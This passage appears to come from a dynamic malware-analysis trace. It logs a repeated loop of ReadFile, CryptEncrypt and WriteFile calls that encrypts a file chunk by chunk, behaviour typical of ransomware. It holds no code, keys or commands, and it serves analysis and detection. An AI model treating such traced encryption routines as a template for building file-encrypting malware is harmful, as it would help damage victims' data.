lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.436] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.436] GetLastError () returned 0x0 [0161.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.436] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.436] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.436] GetLastError () returned 0x0 [0161.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.436] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.436] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.436] GetLastError () returned 0x0 [0161.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.437] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.437] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.437] GetLastError () returned 0x0 [0161.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.437] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.437] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.437] GetLastError () returned 0x0 [0161.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.437] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.437] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.437] GetLastError () returned 0x0 [0161.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.437] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.437] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.437] GetLastError () returned 0x0 [0161.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.437] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.437] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.437] GetLastError () returned 0x0 [0161.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.438] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.438] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.438] GetLastError () returned 0x0 [0161.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.438] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.438] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.438] GetLastError () returned 0x0 [0161.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.438] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.438] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.438] GetLastError () returned 0x0 [0161.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.438] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.438] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.438] GetLastError () returned 0x0 [0161.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.438] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.438] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.438] GetLastError () returned 0x0 [0161.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.439] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.439] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.439] GetLastError () returned 0x0 [0161.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.439] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.439] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.439] GetLastError () returned 0x0 [0161.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.439] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.439] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.439] GetLastError () returned 0x0 [0161.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.439] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.439] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.439] GetLastError () returned 0x0 [0161.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.439] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.439] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.439] GetLastError () returned 0x0 [0161.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.439] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.439] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.439] GetLastError () returned 0x0 [0161.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.440] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.440] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.440] GetLastError () returned 0x0 [0161.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.440] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.440] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.440] GetLastError () returned 0x0 [0161.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.440] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.440] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.440] GetLastError () returned 0x0 [0161.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.440] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.440] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.440] GetLastError () returned 0x0 [0161.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.440] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.441] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.441] GetLastError () returned 0x0 [0161.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.441] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.441] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.441] GetLastError () returned 0x0 [0161.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.441] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.441] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.441] GetLastError () returned 0x0 [0161.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.441] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.441] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.441] GetLastError () returned 0x0 [0161.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.441] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.441] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.441] GetLastError () returned 0x0 [0161.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.441] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.441] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.441] GetLastError () returned 0x0 [0161.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.441] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.441] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.441] GetLastError () returned 0x0 [0161.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.442] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.442] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.442] GetLastError () returned 0x0 [0161.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.442] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.442] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.442] GetLastError () returned 0x0 [0161.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.442] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 